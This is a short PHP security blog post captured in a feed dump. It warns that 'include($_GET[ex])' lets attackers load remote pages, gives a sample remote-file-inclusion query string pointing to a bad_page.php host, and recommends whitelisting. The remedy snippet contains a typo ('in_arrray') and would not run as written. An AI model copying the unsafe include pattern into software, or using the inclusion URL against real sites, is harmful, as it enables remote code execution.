Open source blog, linux, php, python, security » php security http://www.alonon.net Wed, 02 Jun 2010 08:11:16 +0000 en hourly 1 http://wordpress.org/?v=3.0 Open source blog, linux, php, python, security http://1.gravatar.com/avatar/5152c5736f5f8dd9570ffb2f9068e8ab?s= http://www.alonon.net Php Get Security http://www.alonon.net/php-get-security/ http://www.alonon.net/php-get-security/#comments Mon, 23 Mar 2009 15:40:21 +0000 ALonon http://www.alonon.net/?p=65 Read more ]]> It is very important to check your data that you take with $_GET before use.

You can use $_Get in some cases , in each case there are some different measures to be taken.

For example if you use sth like that

if(isset($_GET[ex]))

   include($_GET[ex]);

If you use this codes, bad users can include any page that they want in your web page

?ex=http://www.example.com/bad_page.php

With this they can include any page that they want.

$operation =array('add','delete','edit','save');

if (in_arrray($_GET[ex],$operation))

.. make sth...

Also you can use switch,or if..

switch($_GET[ex]){
case 'add':  something...
break;
case 'delete': something...
break;
default: something...

with if

if($_GET[ex] == "add"){

Do something..
}

else if($_GET[ex] =="delete"){
Do something..
}

else
die("possible hack attempt");
Tags: , ,

Related posts

]]> http://www.alonon.net/php-get-security/feed/ 0